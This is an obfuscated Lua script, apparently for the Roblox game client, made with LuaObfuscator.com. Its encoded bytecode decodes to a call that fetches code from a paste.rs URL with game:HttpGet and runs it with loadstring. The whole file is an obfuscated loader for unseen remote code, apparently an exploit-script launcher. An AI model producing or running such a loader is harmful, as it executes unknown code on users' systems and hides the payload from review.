--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v107=v5(v83,v19);v19=nil;return v107;else return v83;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v84=0 -0 ;local v85;while true do if (v84==(0 -0)) then v85=(v31/((3 -1)^(v32-(2 -(1638 -(1523 + 114))))))%((621 -(555 + 64))^(((v33-(932 -(771 + 86 + 74))) -(v32-(569 -(367 + 201)))) + (928 -(214 + 713)))) ;return v85-(v85%(1 + 0)) ;end end else local v86=2^(v32-(1 + 0)) ;return (((v31%(v86 + v86))>=v86) and 1) or (877 -(282 + 595)) ;end end local function v21() local v34=0 -(0 -0) ;local v35;while true do if (v34==1) then return v35;end if (v34==(117 -(32 + 85))) then v35=v1(v16,v18,v18);v18=v18 + (1066 -(68 + 997)) ;v34=1271 -(226 + 1044) ;end end end local function v22() local v36=0 + 0 ;local v37;local v38;while true do if (v36==(1 + 0)) then return (v38 * (1213 -(892 + 65))) + v37 ;end if (v36==(0 -(180 -(67 + 113)))) then v37,v38=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -(1 + 0)) ;v36=(861 -510) -(87 + 263) ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + ((11 + 4) -11) ;return (v42 * (16778168 -(802 + 150))) + (v41 * (176444 -110908)) + (v40 * (464 -208)) + v39 ;end local function v24() local v43=0 + (0 -0) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(1000 -(915 + 82))) then if (v48==(0 -0)) then if (v47==(0 + 0)) then return v49 * (0 -0) ;else v48=1188 -(1069 + 118) ;v46=0 -0 ;end elseif (v48==2047) then return ((v47==0) and (v49 * (((3 -2) -0)/(0 + 0 + 0)))) or (v49 * NaN) ;end return v8(v49,v48-(804 + 219) ) * (v46 + (v47/(((1058 -(87 + 968)) -1)^((228 -176) + 0)))) ;end if (v43==(792 -(368 + 423))) then v46=886 -(261 + 624) ;v47=(v20(v45,1 -0 ,62 -42 ) * ((20 -(10 + 8))^(122 -(82 + 8)))) + v44 ;v43=(1003 -559) -(416 + 26) ;end if ((1423 -(630 + 793))==v43) then v44=v23();v45=v23();v43=(1416 -(447 + 966)) -2 ;end if ((9 -7)==v43) then v48=v20(v45,(27 -17) + 11 ,54 -23 );v49=((v20(v45,(2287 -(1703 + 114)) -(145 + (994 -(376 + 325))) )==(431 -(44 + 386))) and  -(1914 -(1789 + (202 -78)))) or ((4575 -3088) -(998 + 488)) ;v43=1 + 2 ;end end end local function v25(v50) local v51;if  not v50 then local v87=0;while true do if ((0 + 0)==v87) then v50=v23();if (v50==(0 -0)) then return "";end break;end end end v51=v3(v16,v18,(v18 + v50) -(15 -(9 + 5)) );v18=v18 + v50 ;local v52={};for v66=(1642 -(243 + 1022)) -(85 + 291) , #v51 do v52[v66]=v2(v1(v3(v51,v66,v66)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 0 + 0 ;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if (v53==2) then for v95= #"]",v23() do local v96=(function() return v21();end)();if (v20(v96, #"|", #".")==0) then local v103=(function() return 0;end)();local v104=(function() return;end)();local v105=(function() return;end)();local v106=(function() return;end)();while true do if (v103~=(1 + 0)) then else local v142=(function() return 121 -(17 + 104) ;end)();while true do if ((1 -0)~=v142) then else v103=(function() return 2 + 0 ;end)();break;end if (v142==(0 + 0)) then v106=(function() return {v22(),v22(),nil,nil};end)();if (v104==0) then local v166=(function() return 0 -0 ;end)();local v167=(function() return;end)();while true do if (v166~=(0 -0)) then else v167=(function() return 0 + 0 ;end)();while true do if (v167==0) then v106[ #"-19"]=(function() return v22();end)();v106[ #"?id="]=(function() return v22();end)();break;end end break;end end elseif (v104== #".") then v106[ #"gha"]=(function() return v23();end)();elseif (v104==(1638 -(1373 + 263))) then v106[ #"nil"]=(function() return v23() -((1002 -(451 + 549))^(6 + 10)) ;end)();elseif (v104~= #"91(") then else local v175=(function() return 0 -0 ;end)();while true do if (v175~=0) then else v106[ #"nil"]=(function() return v23() -(2^(26 -10)) ;end)();v106[ #"0313"]=(function() return v22();end)();break;end end end v142=(function() return 1;end)();end end end if (v103==(1384 -(746 + 638))) then local v143=(function() return 0;end)();while true do if (v143==0) then v104=(function() return v20(v96,1 + 1 , #"91(");end)();v105=(function() return v20(v96, #"xnxx",6);end)();v143=(function() return 1 -0 ;end)();end if (v143==1) then v103=(function() return 342 -(218 + 123) ;end)();break;end end end if (2~=v103) then else if (v20(v105, #"|", #"\\")== #"[") then v106[2]=(function() return v59[v106[1583 -(1535 + 46) ]];end)();end if (v20(v105,2,2)== #"]") then v106[ #"-19"]=(function() return v59[v106[ #"xxx"]];end)();end v103=(function() return 3;end)();end if (v103~=(3 + 0)) then else if (v20(v105, #"xnx", #"-19")== #"]") then v106[ #"asd1"]=(function() return v59[v106[ #"http"]];end)();end v54[v95]=(function() return v106;end)();break;end end end end for v97= #" ",v23() do v55[v97-#"{" ]=(function() return v28();end)();end return v57;end if (v53~= #"|") then else local v91=(function() return 0 + 0 ;end)();local v92=(function() return;end)();while true do if (0==v91) then v92=(function() return 560 -(306 + 254) ;end)();while true do if (v92==0) then v58=(function() return v23();end)();v59=(function() return {};end)();v92=(function() return 1 + 0 ;end)();end if (v92==1) then for v150= #":",v58 do local v151=(function() return 0 -0 ;end)();local v152=(function() return;end)();local v153=(function() return;end)();local v154=(function() return;end)();while true do if (v151==(1468 -(899 + 568))) then v154=(function() return nil;end)();while true do if (v152==(0 + 0)) then local v169=(function() return 0;end)();local v170=(function() return;end)();while true do if (0==v169) then v170=(function() return 0 -0 ;end)();while true do if (v170~=1) then else v152=(function() return 604 -(268 + 335) ;end)();break;end if (v170~=0) then else v153=(function() return v21();end)();v154=(function() return nil;end)();v170=(function() return 291 -(60 + 230) ;end)();end end break;end end end if (v152==(573 -(426 + 146))) then if (v153== #"<") then v154=(function() return v21()~=0 ;end)();elseif (v153==2) then v154=(function() return v24();end)();elseif (v153~= #"nil") then else v154=(function() return v25();end)();end v59[v150]=(function() return v154;end)();break;end end break;end if (v151==0) then v152=(function() return 0;end)();v153=(function() return nil;end)();v151=(function() return 1;end)();end end end v57[ #"xnx"]=(function() return v21();end)();v92=(function() return 1 + 1 ;end)();end if (v92==(1458 -(282 + 1174))) then v53=(function() return 2;end)();break;end end break;end end end if (v53==0) then local v93=(function() return 811 -(569 + 242) ;end)();local v94=(function() return;end)();while true do if (v93==(0 -0)) then v94=(function() return 0;end)();while true do if (v94==(0 + 0)) then v54=(function() return {};end)();v55=(function() return {};end)();v94=(function() return 1;end)();end if ((1026 -(706 + 318))==v94) then v53=(function() return  #"}";end)();break;end if (v94~=1) then else v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v94=(function() return 1273 -(945 + 326) ;end)();end end break;end end end end end local function v29(v60,v61,v62) local v63=v60[2 -1 ];local v64=v60[2 + 0 ];local v65=v60[703 -(271 + 429) ];return function(...) local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1 + 0 ;local v73= -(1501 -(1408 + (218 -(116 + 10))));local v74={};local v75={...};local v76=v12("#",...) -(1289 -(993 + 295)) ;local v77={};local v78={};for v88=0,v76 do if (v88>=v70) then v74[v88-v70 ]=v75[v88 + 1 + 0 ];else v78[v88]=v75[v88 + 1 + 0 ];end end local v79=(v76-v70) + (1172 -(418 + 753)) ;local v80;local v81;while true do v80=v68[v72];v81=v80[1 + 0 ];if ((v81<=(1 + 2)) or (2689<=343)) then if (v81<=1) then if ((v81==(738 -(542 + 196))) or (1869==2009)) then local v108=0 + 0 ;local v109;while true do if (v108==(0 + 0)) then v109=v80[531 -((870 -464) + 123) ];v78[v109]=v78[v109](v13(v78,v109 + 1 ,v73));break;end end else v78[v80[(518 + 1253) -(1749 + 11 + 9) ]]={};end elseif (v81>(1 + 1)) then do return;end else local v111=v80[1324 -(1249 + 73) ];local v112,v113=v71(v78[v111](v13(v78,v111 + 1 + 0 + 0 ,v80[3])));v73=(v113 + v111) -(1146 -(466 + 679)) ;local v114=0 -0 ;for v146=v111,v73 do local v147=0;while true do if (v147==0) then v114=v114 + ((4 -2) -(2 -1)) ;v78[v146]=v112[v114];break;end end end end elseif (v81<=(1905 -(106 + 1794))) then if ((v81==((1553 -(1126 + 425)) + 2)) or (2874<2181) or (3546<2322)) then v78[v80[1 + 1 ]]=v62[v80[8 -5 ]];else local v117;local v118,v119;local v120;local v121;v78[v80[5 -3 ]]={};v72=v72 + (115 -(4 + 110)) ;v80=v68[v72];v78[v80[(991 -(118 + 287)) -(57 + 527) ]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[1429 -(41 + 1386) ]]=v62[v80[106 -(17 + 86) ]];v72=v72 + 1 + 0 ;v80=v68[v72];v121=v80[(11 -8) -1 ];v120=v78[v80[8 -5 ]];v78[v121 + (167 -(122 + 44)) ]=v120;v78[v121]=v120[v80[6 -2 ]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[9 -6 ];v72=v72 + 1 ;v80=v68[v72];v121=v80[2 + 0 ];v118,v119=v71(v78[v121](v13(v78,v121 + (1122 -(118 + 1003)) + 0 ,v80[5 -2 ])));v73=(v119 + v121) -(66 -((87 -57) + (412 -(142 + 235)))) ;v117=0 + 0 ;for v148=v121,v73 do local v149=1257 -(1043 + 214) ;while true do if (v149==(0 -0)) then v117=v117 + (1213 -((1465 -1142) + 889)) ;v78[v148]=v118[v117];break;end end end v72=v72 + (2 -1) ;v80=v68[v72];v121=v80[582 -(361 + 219) ];v78[v121]=v78[v121](v13(v78,v121 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[322 -(53 + 267) ]]();v72=v72 + 1 + 0 ;v80=v68[v72];do return;end end elseif (v81<=(419 -(15 + 398))) then local v137=v80[984 -(18 + 210 + 754) ];local v138=v78[v80[11 -(985 -(553 + 424)) ]];v78[v137 + 1 ]=v138;v78[v137]=v138[v80[4]];elseif ((v81==(5 + 2)) or (2082==4773)) then v78[v80[2 + 0 ]]();else v78[v80[2]]=v80[853 -(20 + 830) ];end v72=v72 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403163Q00682Q7470733A2Q2F70617374652E72732F414B74555100094Q00057Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
